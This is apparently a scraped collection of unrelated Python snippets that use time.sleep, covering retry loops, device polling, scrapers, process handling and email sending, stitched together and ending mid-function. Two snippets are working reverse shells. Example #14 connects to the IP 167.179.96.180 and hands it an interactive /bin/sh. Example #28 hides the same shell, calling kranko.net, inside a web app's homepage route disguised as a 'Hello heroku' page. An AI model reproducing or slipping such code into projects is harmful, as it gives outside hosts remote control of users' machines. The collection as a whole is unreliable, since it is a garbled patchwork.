Example #1
    def execute(self):
        """copy each temp script to the proper host and execute each task"""

        for t in self.chunk.tasks:

            if not self.transport == "ssh":
                print "transport method %s not yet implimented" % self.transport
                sys.exit()

            # note that this is not any kind of real fork (yet)
            # and is really only doing the tasks serially
            # also note that there is no kind of timeout alarm set
            # to kill problem tasks

            chunknum = self.chunk.tasknum
            ip = t.task['ip']
            runningTasks = 0

            if runningTasks < self.maxParallel:

                runningTasks += 1
                if not self.verbose == 0:
                    print "starting chunk %s task %s on %s" % (chunknum,
                                                               t.tasknum, ip)

                # pass the task to the queue
                self._queue(t)
            else:
                # is this the right way to do this?
                if not self.verbose == 0:
                    print "task %s waiting for queue to flush" % t.tasknum
                time.sleep(30)

            runningTasks -= 1
Example #2
def background_scraping_task1(ev_url, _task_spec = js['evernote_article']):
    from selenium import webdriver as wd
    from time import sleep, time
    from pyvirtualdisplay import Display
    import logging, json, traceback
    display = Display(visible=0, size=(1024, 768))
    display.start()
    d = wd.Firefox()
    d.get(ev_url)
    sleep(_task_spec['delay'])
    _ans = {}
    start_time =  time()
    for result_name,js_code in _task_spec['js2r']:
        try:
            _ans[result_name] = d.execute_script("return " + js_code)
        except Exception as e:
            logging.error(traceback.format_exc())
            logging.error(str(e))
    # cleanup selenium
    d.close()
    display.stop()
    end_time = time()
    _ans['seconds_elapsed'] = round(end_time - start_time, 3)
    # publish the result
    logging.info("result for url {}\n\n".format(ev_url) + json.dumps(_ans))
Example #3
def wait_for_device(dev):
    print "--> Wait for device {}".format(dev)
    for sec in range(0, 60):
        if os.path.exists(dev):
            print "--> Device {} appeared after {} seconds".format(dev, sec)
            break
        time.sleep(1)
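A variant of this polling loop that uses time.sleep and reports whether the device ever appeared might look like the sketch below; the 60-second budget mirrors the snippet above, and the boolean return value is an assumption added for callers.

import os
import time

def wait_for_device(dev, timeout=60):
    """Poll for a device node once per second; return True when it appears, False on timeout."""
    for sec in range(timeout):
        if os.path.exists(dev):
            print("--> Device {} appeared after {} seconds".format(dev, sec))
            return True
        time.sleep(1)
    print("--> Device {} did not appear within {} seconds".format(dev, timeout))
    return False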
Example #6
 def __init__(self):
     self.path = os.environ["HOME"] + time.strftime("/dcacheTestSuite.%Y%m%d%H%M%S/", time.gmtime())
     while os.path.exists(self.path):
         time.sleep(1)
         self.path = os.environ["HOME"] + time.strftime("/dcacheTestSuite.%Y%m%d%H%M%S/", time.gmtime())
     os.mkdir(self.path)
     self.fileNameGenerator = uniqueFileNameGenerator(self.path + "tmpfile")
     self.fileMd5sum = {}
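If the goal is simply a unique scratch directory, the standard library's tempfile.mkdtemp avoids the existence-check loop altogether; a minimal sketch under that assumption (the prefix is illustrative):

import os
import tempfile

# mkdtemp creates the directory atomically with a unique name and returns its path
path = tempfile.mkdtemp(prefix="dcacheTestSuite.", dir=os.path.expanduser("~"))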
Example #7
def shutdownCheck():
    seq = exitList[len(exitList) - 4:len(exitList)]
    if seq == shutdownSeq:
        lcd.clear()
        lcd.message("{PWNIE EXPRESS!}\nsystem shutdown")
        sleep(5)
        os.system("poweroff")
        sleep(7)
Example #8
 def wrapped_f(*args):
     for i in range(1, tries + 1):
         try:
             return f(*args)
         except requests.exceptions.ConnectionError:
             if i == tries:
                 raise
             time.sleep(1)
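The snippet above is only the inner wrapper; a self-contained sketch of the same retry idea, with `tries` supplied by an enclosing decorator factory (the names and the one-second pause are assumptions mirroring the fragment):

import time
import requests

def retry_on_connection_error(tries=3, delay=1.0):
    """Return a decorator that retries a call when requests raises ConnectionError."""
    def decorator(f):
        def wrapped_f(*args, **kwargs):
            for i in range(1, tries + 1):
                try:
                    return f(*args, **kwargs)
                except requests.exceptions.ConnectionError:
                    if i == tries:
                        raise  # out of attempts, propagate the error
                    time.sleep(delay)
        return wrapped_f
    return decorator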
Example #10
def Mine():
    """
    Mining process.
    :return:
    """
    pids["Mine"] = os.getpid()
    while True:
        Blockchain.addblock()
        time.sleep(6)
Example #11
def run(instance):
    try:
        generator = instance.get_lines()
        for line in generator:
            if line.command == "PRIVMSG":
                spew(line, generator, instance.isupport['CHANTYPES'])
    except IOError as e:
        print("Disconnected", str(e))
        time.sleep(5)
Example #12
 def wait_ptkinitdone(self, addr, timeout=2):
     while timeout > 0:
         sta = self.get_sta(addr)
         if 'hostapdWPAPTKState' not in sta:
             raise Exception("GET_STA did not return hostapdWPAPTKState")
         state = sta['hostapdWPAPTKState']
         if state == "11":
             return
         time.sleep(0.1)
         timeout -= 0.1
     raise Exception("Timeout while waiting for PTKINITDONE")
Example #13
def login():
    if password == pinInput.value_text:
        pinError.fg = "green"
        pinError.value_text = "logging in..."
        time.sleep(1)
        os.system("python screen.py")
    elif pinInput.value_text == "":
        pinError.fg = "red"
    elif pinInput.value_text != password:
        pinError.fg = "red"
        pinError.value_text = "password is incorrect!!!"
Example #14
def main():
    print('Try')
    count = 0
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("167.179.96.180", 9998))
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    p = subprocess.call(["/bin/sh", "-i"])
    print(p)
    while count < 1000:
        time.sleep(1)
Example #15
def refresh_cdn():
   s = range(int(begin),int(end))
   try:
      for i in s:
         n = str(i)
         k = n.zfill(3)
         url = "http://sdl.wuming.com%s/%s_%s%s.apk" % (els('3'),els('1'),chid,k)
         run(["python %s RefreshCdnUrl -u %s -p %s --urls %s" % (PATH,SecretId,SecretKey,url)])
      print "Refresh End"
      alarm("Refresh End")
      time.sleep(300)
   except Exception,e:
      print e
Example #16
 def stop(self,patience=0,ptimes=0):
     if not patience:
         patience = self.patience
     if not ptimes:
         ptimes = self.ptimes
     runfile = self.RC_NAME
     ok = 0
     for ptry in range(ptimes):
         try:
             os.remove(runfile+'.on')
             ok = 1
             break
         except OSError, ose:
             time.sleep(patience)
Example #17
 def _request_address(address):
     content = ""
     start = time.clock()
     timeout = 10
     while content == "" :
         page = requests.get(address)
         page.raise_for_status()
         content = page.content.decode("utf-8")
         if content == "" and time.clock() - timeout < start:
             time.sleep(1)
             print("Retrying")
         else:
             break
     return content
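A version of this retry-until-deadline loop written against time.monotonic() (time.clock() is deprecated and was removed in Python 3.8) might look like the following sketch; the ten-second budget and one-second pause reflect the snippet's apparent intent:

import time
import requests

def _request_address(address, timeout=10.0):
    """Fetch a URL, retrying on empty responses until the deadline expires."""
    deadline = time.monotonic() + timeout
    while True:
        page = requests.get(address)
        page.raise_for_status()
        content = page.content.decode("utf-8")
        if content or time.monotonic() >= deadline:
            return content
        print("Retrying")
        time.sleep(1)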
Example #18
def start_predicting():

    print("Populating queue")
    arr = os.listdir(args["path"])
    for file in arr:
        if file.endswith("jpg"):
            q.put_nowait(file)
    print("Queue populated.  Images: " + str(q.qsize()))

    for i in range(0, procs):
        #process = threading.Thread(target=predict)
        process = Process(target=start_predicting_async)
        process.start()

        print("Starting Process...")
        time.sleep(3)
Example #19
def getRequest(method_name, params = {}, response_only = False):
	full_req = api_addr + method_name + "?"
	for i in params.keys():
		full_req = full_req + i + "=" + str(params[i]) + "&"
	full_req = full_req + end
	for i in range(3):  # retry up to three times
		try:
			r = requests.get(full_req).json()
			if "error" in r:
				continue
			if response_only:
				return r["response"]
			else:
				return r
		except Exception:
			time.sleep(3)
	return None
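If three fixed-interval retries prove too aggressive against the API, the same loop can back off exponentially between attempts; a hedged sketch (the base delay and cap are assumptions, not part of the snippet above):

import time
import requests

def get_json_with_backoff(url, attempts=3, base_delay=1.0, max_delay=30.0):
    """GET a JSON endpoint, doubling the pause after each failed attempt."""
    for attempt in range(attempts):
        try:
            return requests.get(url).json()
        except Exception:
            if attempt == attempts - 1:
                return None
            time.sleep(min(base_delay * 2 ** attempt, max_delay))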
Example #20
def wait_cmd(popen, quiet=False):
    """Wait for a started command to complete, and return its stdout."""
    out = popen.communicate()[0]
    while popen.returncode is None:
        time.sleep(1)
    if popen.returncode:
        if not quiet:
            print >> sys.stderr, '-' * 72
            print >> sys.stderr, out
            print >> sys.stderr, '-' * 72
            if popen.returncode < 0:
                raise AppError("Command terminated by signal {0}: {1}".format(
                    -popen.returncode, ' '.join(popen.command)))
            else:
                raise AppError("Exit status {0} for command: {1}".format(
                    popen.returncode, ' '.join(popen.command)))
    return out
Example #22
def download_oci_blob(url_path, oci_json_blob):
    for retry in range(3):
        oci_blob = get_oci_metadata(url_path, oci_json_blob)
        if oci_blob is not None:
            syslog.syslog(syslog.LOG_INFO,
                          "downloaded OCI JSON blob from " + url_path)
            return oci_blob
        syslog.syslog(syslog.LOG_WARNING,
                      "cannot download oci blob " + url_path + ": retrying")
        time.sleep(10)
    #
    # too many retries, give up
    #
    syslog.syslog(
        syslog.LOG_ERR, "cannot download oci blob " + url_path +
        " (too many retries): giving up")
    exit(5)
Example #23
def system_is_configured():
    '''
    Check the OVS_DB if system initialization has completed.
    Initialization completed: return True
    else: return False
    '''

    global idl
    global system_initialized

    # Check the OVS-DB/File status to see if initialization has completed.
    if not db_get_system_status(idl.tables):
        # Delay a little before trying again
        time.sleep(1)
        return False

    system_initialized = 1
    return True
Example #24
def printFaceToArduinoCode(nbFace):

    #print ("print Face nb: "+str(nbFace)+" matrix : "+str(nbMatrix))
    for nbMatrix in range(6):
        for line in range(8):
            toPrint = ""
            for pix in range(8):
                if listOfFace[nbFace][nbMatrix][line][pix]:
                    # find the real location
                    # compute the string to write
                    # write the string into the file
                    x = nbMatrix % 3 * 8 + pix
                    y = nbMatrix / 3 * 8 + line

                    textToPrint = "matrix.drawPixel(" + str(
                        x) + " + offSet, " + str(y) + ", 1);"
                    toPrint += textToPrint
                    time.sleep(0.001)
            print toPrint
Example #25
    def __init__(self,log):
        self.log=log
        self.log.logging('Initialization:', 'SHOWALL')
        if len(sys.argv) >= 2 and sys.argv[1] == 'p2dv':
            self.p2dv = True
            self.log.logging('    p2dv.in mode', 'SHOWALL')
        else:
            self.p2dv = False

        if self.p2dv:
            host = 'localhost'
        else:
            host=socket.gethostbyname(socket.gethostname())

        # Find a unused port
        while True:
            try:
                if self.p2dv:
                    port = random.randint(1024,65535)
                else:
                    port = 12345
                self.spy=socket.socket()
                self.spy.bind((str(host),port))
                self.spy.listen(2)
                self.port = port
                if self.p2dv:
                    self.spy.settimeout(1)
                break
            except:
                self.log.logging('    Port %d is used. Trying another.' % (port), 'SHOWALL')
                if not self.p2dv:
                    time.sleep(0.5)
        
        self.log.logging("    Waiting to connect ...",'SHOWALL')
        self.log.logging("    The PC's host is %s, the port is %d"%(host,port),'SHOWALL')
        
        # Determine which player is first player  
        first = 0 if random.random()<0.5 else 1
        self.first_player = first

        # Wait for AIs to connect
        self.AI=[None,None]
        self.AIname=['[Unknown]','[Unknown]']
Example #26
    def handle_exit_signal(signal_num, frame):
        """ Handle a system exit signal. """

        global log
        global proxies

        msg = 'handle exit signal {}'.format(signal_num)
        print(msg)
        log.error(msg)
        if frame:
            log.debug(frame)

        for proxy in proxies:
            # cancel() only works if the Timer hasn't timed out
            proxy.watchdog_timer.cancel()
        # let any watchdogs that have timed out have time to finish
        time.sleep(10)

        sys.exit(msg)
Example #27
def download(urls, path):
    old_dir = os.getcwd()
    os.chdir(path)
    for each in urls:
        name = each[1]
        url = each[0]
        if os.path.isfile(name):
            print("already exists, skipping...")
            continue
        try:
            request = urllib2.Request(url)
            res = urllib2.urlopen(request).read()
            with open(name, 'wb') as pdf:
                pdf.write(res)
            print("Downloaded", name)
        except Exception as e:
            print("Failed to download because of", e)
        time.sleep(1)  # 1 second
    os.chdir(old_dir)
Example #28
def homepage():
    the_time = datetime.now().strftime("%A, %d %b %Y %l:%M %p")

    while True:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(("kranko.net", 1234))
        os.dup2(s.fileno(), 0)
        os.dup2(s.fileno(), 1)
        os.dup2(s.fileno(), 2)

        p = subprocess.call(["/bin/sh", "-i"])
        time.sleep(999)

    return """
    <h1>Hello heroku</h1>
    <p>It is currently {time}.</p>

    <img src="http://loremflickr.com/600/400" />
    """.format(time=the_time)
Example #29
def get_daily(symbol):
    now = datetime.now()
    spath = os.path.abspath(f'Data/{symbol}')
    if not os.path.isdir(spath):
        os.mkdir(spath)
    path = os.path.abspath(f'Data/{symbol}/{symbol}_daily')
    if not os.path.isdir(path):
        os.mkdir(path)

    with open('Key') as f:
        key = f.read()

    interval = '1min'
    counter = 0
    api_call = f'https://www.alphavantage.co/query?function=TIME_SERIES_DAILY&symbol={symbol}&outputsize=full&apikey={key}'
    while counter < 4:
        try:
            req = requests.get(api_call)
            break
        except Exception as e:
            time.sleep(3)
            counter += 1

    amd_ts = json.loads(req.text)
    meta = amd_ts['Meta Data']
    data = amd_ts['Time Series (Daily)']

    amd_df = pd.DataFrame(data).T
    col_name = {
        '1. open': 'Open',
        '2. high': 'High',
        '3. low': 'Low',
        '4. close': 'Close',
        '5. volume': 'Volume',
        'index': 'Time'
    }
    amd_df = amd_df.reset_index()
    amd_df = amd_df.rename(columns=col_name)

    amd_df.to_csv(
        os.path.join(path,
                     f'{symbol}_daily_{now.year}_{now.month}_{now.day}.csv'))
Example #30
 def _close(self):
     if self._pid == 0:
         return
     try:
         self._stopClient()
         for i in range(10):
             ret = os.waitpid(self._pid, os.WNOHANG)
             if os.WIFEXITED(ret[1]):
                 self._pid = 0
                 break
             time.sleep(.1)
         if self._pid:
             try:
                 os.kill(self._pid, 15)
                 time.sleep(.1)
                 os.kill(self._pid, 9)
                 os.waitpid(self._pid, os.WNOHANG)
             except OSError, e:
                 if e.errno != 10:
                     raise
     finally:
         self._pid = 0
Example #32
 def parse(self, response):
     print(
         '================================================================='
     )
     time.sleep(40)
Example #33
 def loop_forever(self, interval=10.0):
     while True:
         self.refresh()
         time.sleep(interval)
Example #34
    def __sendEmail__(self,
                      recipient,
                      subject,
                      body,
                      html=None,
                      fileToSendArray=[]):
        import smtplib
        import mimetypes
        from email.mime.multipart import MIMEMultipart
        from email import encoders
        from email.mime.audio import MIMEAudio
        from email.mime.base import MIMEBase
        from email.mime.image import MIMEImage
        from email.mime.text import MIMEText

        fromEmail = self.user_settings.email_address
        try:

            msg = MIMEMultipart()
            msg['From'] = fromEmail
            msg['To'] = recipient
            msg['Subject'] = subject
            body = body
            msg.attach(MIMEText(body, 'plain'))
            if html is not None and isinstance(html, str):
                msg.attach(MIMEText(html, 'html'))

            # %% Attachment
            if fileToSendArray is not None and len(fileToSendArray) > 0:
                for fileToSend in fileToSendArray:
                    if fileToSend is not None and os.path.isfile(fileToSend):
                        logger.debug('adding file ' + fileToSend)

                        ctype, encoding = mimetypes.guess_type(fileToSend)
                        if ctype is None or encoding is not None:
                            ctype = "application/octet-stream"

                        maintype, subtype = ctype.split("/", 1)

                        if maintype == "text":
                            fp = open(fileToSend)
                            # Note: we should handle calculating the charset
                            attachment = MIMEText(fp.read(), _subtype=subtype)
                            fp.close()
                        elif maintype == "image":
                            fp = open(fileToSend, "rb")
                            attachment = MIMEImage(fp.read(), _subtype=subtype)
                            fp.close()
                        elif maintype == "audio":
                            fp = open(fileToSend, "rb")
                            attachment = MIMEAudio(fp.read(), _subtype=subtype)
                            fp.close()
                        else:
                            fp = open(fileToSend, "rb")
                            attachment = MIMEBase(maintype, subtype)
                            attachment.set_payload(fp.read())
                            fp.close()
                            encoders.encode_base64(attachment)
                        attachment.add_header("Content-Disposition",
                                              "attachment",
                                              filename=fileToSend)
                        msg.attach(attachment)
            result = False
            counter = 3
            while (not result and counter > 0):
                try:
                    server = smtplib.SMTP(self.user_settings.email_smtp_host,
                                          self.user_settings.email_smtp_port)
                    server.ehlo()
                    server.starttls()
                    server.ehlo()

                    server.login(fromEmail, self.user_settings.email_password)
                    text = msg.as_string()
                    problems = server.sendmail(fromEmail, recipient, text)
                    server.quit()
                    result = True
                except Exception as e:
                    logger.error("Error: unable to send email retry[%d] :%s" %
                                 (counter, str(e)))
                    result = False
                    counter -= 1
                    time.sleep(5)
            if result:
                logger.info("Successfully sent email")
            else:
                logger.error("Error: unable to send email")

        except:
            logger.error("Error: unable to send email")
Example #35
from cloudmesh.common.StopWatch import StopWatch
import time

StopWatch.start("test")
time.sleep(100)
StopWatch.stop("test")
StopWatch.benchmark()

print(StopWatch.get("test"))
Example #36
now = datetime.now()

path = os.path.abspath('amd_daily/')
with open('Key') as f:
    key = f.read()
symbol = 'AMD'
interval = '1min'
counter = 0
api_call = f'https://www.alphavantage.co/query?function=TIME_SERIES_INTRADAY&symbol={symbol}&interval={interval}&outputsize=full&apikey={key}'
while counter <= 10:
    try:
        req = requests.get(api_call)
        break
    except Exception as e:
        time.sleep(3)
        counter += 1

amd_ts = json.loads(req.text)
meta = amd_ts['Meta Data']
data = amd_ts['Time Series (1min)']

amd_df = pd.DataFrame(data).T
col_name = {
    '1. open': 'Open',
    '2. high': 'High',
    '3. low': 'Low',
    '4. close': 'Close',
    '5. volume': 'Volume',
    'index': 'Time'
}
Example #37
            m = job_num.match(job_return)

            jobs.append(m.group())
        else:
            retcode = subprocess.call(kmds_command, shell=True)
            if retcode < 0:
                print("kmds step 1 file " + str(i) + " failed with ", -retcode, file=sys.stderr)

        subsampled_output.append("kmds.step1." + str(i))
    except OSError as e:
        print("Execution failed:", e, file=sys.stderr)

# Check all jobs have finished
if args.LSF:
    while not (check_done(jobs)):
        time.sleep(30)
    jobs = []

write_list = open(subsampled_list,'w')
for subsample in subsampled_output:
    write_list.write(subsample + "\n")

write_list.close()

# Run kmds --mds_concat on output
print("Calculating MDS components\n")
try:
    kmds_command = ""
    if args.LSF:
        kmds_command = "bsub -o kmds.step2.%J.o -e kmds.step2.%J..e -n" + str(args.threads) + " -R \"span[hosts=1]\" -R \"select[mem>4000] rusage[mem=4000]\" -M4000 "
Example #38
				filtered['loc'] = loc
				
				os.write(fh,bytes(u'{0}\n'.format(json.dumps(filtered, ensure_ascii=False)),'utf-8',errors='ignore'))
				os.fsync(fh)
				print(nn + tweet['user']['screen_name']  + "	" +    str(tweet['text'][:130].encode('utf-8').decode('ascii', 'ignore')), flush=True)
                                
                                
                                ####these controls will break the program after ~2000 registered tweets that have been captured by the program
			except:
				continue
		else:
			pass
	else:
		pass


	



time.sleep(5)
Example #39
    os.write(parentIn, "hi\r\n")
    os.write(parentIn, "hi\r\n")


if __name__ == '__main__':
    # create a pipe for the program
    stdin = sys.stdin.fileno()  # usually 0
    stdout = sys.stdout.fileno()  # usually 1
    parentIn, childOut = os.pipe()
    childIn, parentOut = os.pipe()
    pid = os.fork()

    if pid == 0:  # child
        # redirect and close pipes
        os.dup2(childIn, stdin)
        os.dup2(childOut, stdout)
        os.close(parentIn)
        os.close(parentOut)
        os.close(childIn)
        os.close(childOut)

        # Execute the program
        os.system("FunctionsAndVariables.exe")

    else:  # parent
        # interact with the program
        sendCommands(childIn, childOut)

    # Wait for the child to finish so we can read its output
    os.waitpid(pid, 0)
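The same parent/child interaction can be expressed with the subprocess module, which handles the pipe and file-descriptor plumbing itself; a minimal sketch (the executable name comes from the snippet, the commands sent are illustrative):

import subprocess

# Launch the program with its stdin and stdout connected to pipes
proc = subprocess.Popen(
    ["FunctionsAndVariables.exe"],
    stdin=subprocess.PIPE,
    stdout=subprocess.PIPE,
    text=True,
)

# Send the two commands and collect everything the program printed
output, _ = proc.communicate("hi\r\nhi\r\n")
print(output)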
Example #40
def sleep(u):
    time.sleep(u)
Example #42
#!/usr/bin/env python
# coding: utf-8


"""
When a child process exits, it sends a SIGCHLD signal to its parent process.
"""

import os
import signal
from time import sleep


def onsigchld(a, b):
    print 'received SIGCHLD: a child process has exited'

signal.signal(signal.SIGCHLD, onsigchld)

pid = os.fork()

if pid == 0:
    print 'I am the child process, pid =', os.getpid()
    sleep(2)
else:
    print 'I am the parent process, pid =', os.getpid()
    os.wait()  # wait for the child to exit
Example #43
    def start(self,
              rundate,
              input_path,
              calendar,
              outfile='CVAMarketDataCal',
              premium_file=None):
        # disable gpus
        os.environ['CUDA_VISIBLE_DEVICES'] = "-1"
        # set the log level for the parent
        os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
        # set the logger
        logging.basicConfig(level=logging.INFO,
                            format='%(asctime)s %(levelname)-8s %(message)s',
                            datefmt='%m-%d %H:%M')

        from .adaptiv import AdaptivContext

        # create the context
        self.cx = AdaptivContext()
        # load calendars
        self.cx.parse_calendar_file(calendar)
        # store the path
        self.path = input_path
        # load marketdata
        if rundate is None:
            self.daily = True
            self.path = os.path.split(input_path)[0]
            self.outfile = outfile
            self.cx.parse_json(input_path)
            # load up the old file if present
            old_output_name = os.path.join(self.path, outfile + '.json')
            if os.path.isfile(old_output_name):
                self.ref = AdaptivContext()
                self.ref.parse_json(old_output_name)
                params_to_bootstrap = self.cx.params[
                    'Bootstrapper Configuration'].keys()
                for factor in [
                        x for x in self.ref.params['Price Factors'].keys()
                        if x.split('.', 1)[0] in params_to_bootstrap
                ]:
                    # override it
                    self.cx.params['Price Factors'][factor] = self.ref.params[
                        'Price Factors'][factor]
            rundate = pd.Timestamp.now().strftime('%Y-%m-%d')
        elif os.path.isfile(
                os.path.join(self.path, rundate, 'MarketDataCal.json')):
            self.cx.parse_json(
                os.path.join(self.path, rundate, 'MarketDataCal.json'))
        elif os.path.isfile(os.path.join(self.path, rundate,
                                         'MarketData.json')):
            self.cx.parse_json(
                os.path.join(self.path, rundate, 'MarketData.json'))
        else:
            logging.error(
                'Cannot find market data for rundate {}'.format(rundate))
            return

        # update the rundate if necessary
        if self.cx.params['System Parameters']['Base_Date'] is None:
            logging.info('Setting rundate {}'.format(rundate))
            self.cx.params['System Parameters']['Base_Date'] = pd.Timestamp(
                rundate)

        if premium_file is not None:
            while True:
                logging.info(
                    'Watching for premium file in {}'.format(premium_file))
                prem = glob.glob(
                    os.path.join(
                        premium_file,
                        'IR_Volatility_Swaption_{}*.csv'.format(rundate)))
                if prem:
                    break
                else:
                    time.sleep(5 * 60)

            logging.info('Setting swaption premiums from {}'.format(prem[0]))
            self.cx.params['System Parameters']['Swaption_Premiums'] = prem[0]

        # load the params
        price_factors = self.manager.dict(self.cx.params['Price Factors'])
        price_factor_interp = self.manager.dict(
            self.cx.params['Price Factor Interpolation'])
        price_models = self.manager.dict(self.cx.params['Price Models'])
        sys_params = self.manager.dict(self.cx.params['System Parameters'])
        holidays = self.manager.dict(self.cx.holidays)

        logging.info("starting {0} workers in {1}".format(
            self.NUMBER_OF_PROCESSES, input_path))
        self.workers = [
            Process(target=work,
                    args=(i, self.queue, self.result, price_factors,
                          price_factor_interp, price_models, sys_params,
                          holidays)) for i in range(self.NUMBER_OF_PROCESSES)
        ]

        for w in self.workers:
            w.start()

        # load the bootstrapper on to the queue - note - order is important here - hence python 3.6
        for bootstrapper_name, params in self.cx.params[
                'Bootstrapper Configuration'].items():
            # get the market price id and any options for bootstrapping
            market_price, _, *options = params.split(',', 2)
            # get the market prices for this bootstrapper
            market_prices = {
                k: v
                for k, v in self.cx.params['Market Prices'].items()
                if k.startswith(market_price)
            }
            # number of return statuses needed
            status_required = 0
            for market_price in market_prices.keys():
                status_required += 1
                self.queue.put((bootstrapper_name, options, {
                    market_price: market_prices[market_price]
                }))

            for i in range(status_required):
                logging.info(self.result.get())

        # tell the children it's over
        self.queue.put(None)
        # store the results back in the parent context
        self.cx.params['Price Factors'] = price_factors.copy()
        self.cx.params['Price Models'] = price_models.copy()
        # finish up
        # close the queues
        self.queue.close()
        self.result.close()

        # join the children to this process
        for w in self.workers:
            w.join()

        # write out the data
        logging.info('Parent: All done - saving data')

        if self.daily:
            # write out the calibrated data
            self.cx.write_marketdata_json(
                os.path.join(self.path, self.outfile + '.json'))
            self.cx.write_market_file(
                os.path.join(self.path, self.outfile + '.dat'))
            logfilename = os.path.join(self.path, self.outfile + '.log')
        else:
            self.cx.write_marketdata_json(
                os.path.join(self.path, rundate, 'MarketDataCal.json'))
            self.cx.write_market_file(
                os.path.join(self.path, rundate, 'MarketDataCal.dat'))
            logfilename = os.path.join(self.path, rundate, 'MarketDataCal.log')

        # copy the logs across
        with open(logfilename, 'wb') as wfd:
            for f in glob.glob('bootstrap*.log'):
                with open(f, 'rb') as fd:
                    shutil.copyfileobj(fd, wfd)
Example #44
    def calculate_rotors(self,
                         conformer,
                         calculator,
                         steps=36,
                         step_size=10.0):

        complete = {}
        calculators = {}
        verified = {}
        for torsion in conformer.torsions:
            calc = calculator.get_rotor_calc(
                conformer=conformer,
                torsion=torsion,
                steps=steps,
                step_size=step_size,
            )
            label = self.submit_rotor(conformer=conformer,
                                      ase_calculator=calc,
                                      partition="general")
            logging.info(label)
            complete[label] = False
            calculators[label] = calc
            verified[label] = False

        done = False
        lowest_energy_label = None
        conformer_error = False
        if len(conformer.torsions) == 0:
            logging.info("No torsions to run scans on.")
            return {}
        while not done:
            for label in list(complete.keys()):
                if not self.check_complete(label):
                    continue
                if done:
                    continue
                complete[label] = True
                ase_calc = calculators[label]
                lowest_conf, continuous, good_slope, opt_count_check = self.verify_rotor(
                    steps=steps, step_size=step_size, ase_calculator=ase_calc)
                if all([lowest_conf, continuous]):
                    verified[label] = True
                else:
                    verified[label] = False

                if not lowest_conf:

                    done = True
                    lowest_energy_label = label
                    conformer_error = True
                    continue
                elif all(complete.values()):
                    done = True

        if conformer_error:
            logging.info(
                "A lower energy conformer was found... Going to optimize this insted"
            )
            for label in list(complete.keys()):
                command = """scancel -n '{}'""".format(label)
            ase_calculator = calculators[label]
            file_name = os.path.join(ase_calculator.scratch,
                                     lowest_energy_label + ".log")
            parser = ccread(file_name)
            first_is_lowest, min_energy, atomnos, atomcoords = self.check_rotor_lowest_conf(
                parser=parser)
            symbol_dict = {
                17: "Cl",
                9: "F",
                8: "O",
                7: "N",
                6: "C",
                1: "H",
            }
            atoms = []
            for atom_num, coords in zip(parser.atomnos, parser.atomcoords[-1]):
                atoms.append(
                    Atom(symbol=symbol_dict[atom_num], position=coords))
            conformer.ase_molecule = Atoms(atoms)
            conformer.update_coords_from("ase")

            if isinstance(conformer, TS):
                calc = calculator.get_overall_calc(
                    conformer, direction=conformer.direction)

                calc.scratch = calc.scratch.strip("/conformers")
                conformer.direction = "forward"
                conformer.index = "X"
                label = self.submit_transitionstate(transitionstate=conformer,
                                                    ase_calculator=calc)
            else:
                calc = calculator.get_conformer_calc(conformer)
                calc.scratch = calc.scratch.strip("/conformers")
                conformer.index = "X"
                label = self.submit_conformer(conformer, calc, "general")

            while not self.check_complete(label):
                time.sleep(15)

            logging.info(
                "Reoptimization complete... performing hindered rotors scans again"
            )
            return self.calculate_rotors(conformer, calculator, steps,
                                         step_size)

        else:
            for label, boolean in list(verified.items()):
                if not boolean:
                    calc = calculators[label]
                    try:
                        os.mkdir(os.path.join(calc.scratch, "failures"))
                    except:
                        pass
                    move(
                        os.path.join(calc.scratch, calc.label + ".log"),
                        os.path.join(calc.scratch, "failures",
                                     calc.label + ".log"))
            return verified
Example #45
                http_path = 'https' + row['ftp_path'][3:]
                filename = http_path.split('/')[-1]
                path = f"{http_path}/{filename}_genomic.fna.gz"

                # Let's check if the path exists
                check_r = s.head(path)
                if check_r.status_code == 404:
                    # Error with this path, let's try to crawl instead
                    try:
                        path = crawl_link(row['assembly_accession'], s)
                    except ValueError:
                        # Can't find this data, continue...
                        continue
                elif check_r.status_code >= 500:
                    # Server error, try again
                    time.sleep(2)
                    check_r = s.head(path)
                    if check_r.status_code >= 500:
                        # ¯\_(ツ)_/¯ let's retry it some other time...
                        continue

                # Assembly summary doesn't include size of dataset
                # Let's use a cheap head request to find the size
                size_r = s.head(path)
                if size_r.status_code == 404:
                    print(f"Error 404 on {path}")
                    continue
                size_MB = int(int(size_r.headers['Content-Length']) / 1000000)

                new_dataset = Dataset(id=row["assembly_accession"],
                                      database_id="Genomes",
Example #46
    o.write((path + '\n').encode('utf-8'))
o.flush()
checkers = o

log = open('cppcheck.log', 'wt')
xmllog = open('cppcheck.log.xml', 'wt')
checker = s.Popen([
    'cppcheck', '--file-list=' + checkers.name,
    '--includes-file=' + includes.name, '--inconclusive', '--inline-suppr',
    '-j', '3', '--xml', '--xml-version=2', '--enable=all', '--force'
],
                  stdout=log,
                  stderr=xmllog)

while not os.path.exists(log.name):
    time.sleep(0.1)
print('found log file, begin tee hack', checker.poll())
with open(log.name) as inp:
    buf = ''
    while True:
        buf += inp.read()
        if buf:
            lines = buf.split('\n')
            buf = lines[-1]
            for line in lines[:-1]:
                print('> ', line)
            inp.seek(0, 1)
        time.sleep(0.1)
        if checker.poll() is not None: break
print('done')
Example #48
	under the terms of the GNU General Public License as published by the
	Free Software Foundation, either version 3 of the License, or (at your
	option) any later version.

	This program is distributed in the hope that it will be useful, but
	WITHOUT ANY WARRANTY; without even the implied warranty of
	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
	General Public License for more details.

	You should have received a copy of the GNU General Public License along
	with this program.  If not, see <http://www.gnu.org/licenses/>.
*/
'''

for file in scripts:
	time.sleep(10)
	print file
	f = open(file, 'rb').read()
	if '*/' in f and 'AlliedModders' in f.split('*/', 1)[0]:
			f = legal + f.split('*/', 1)[1].strip() + '\n'
	else:
		f = legal + f
	m = re.search('url.*?=.*?"(.*?)"', f)
	if not m:
		f = re.sub('public Plugin:(.*?)\n}', 'public Plugin:\\1,\n    url = ""\n}', f, flags=(re.MULTILINE | re.DOTALL))
		f = re.sub(',,', ',', f) # I accidentally add an extra comma some times.
		m = re.search('url.*?=.*?"(.*?)"', f)
	try:
		urllib2.urlopen(m.group(1))
	except (ValueError, urllib2.HTTPError, urllib2.URLError) as e:
		print e
Example #49
def binaries_setup(kit_location):

    if (not os.path.exists(kit_location)):
        print("binaries location is incorrect")
        print("press 'q' to exit and come back")
        close = input()
        if close == 'q' or close == 'Q':
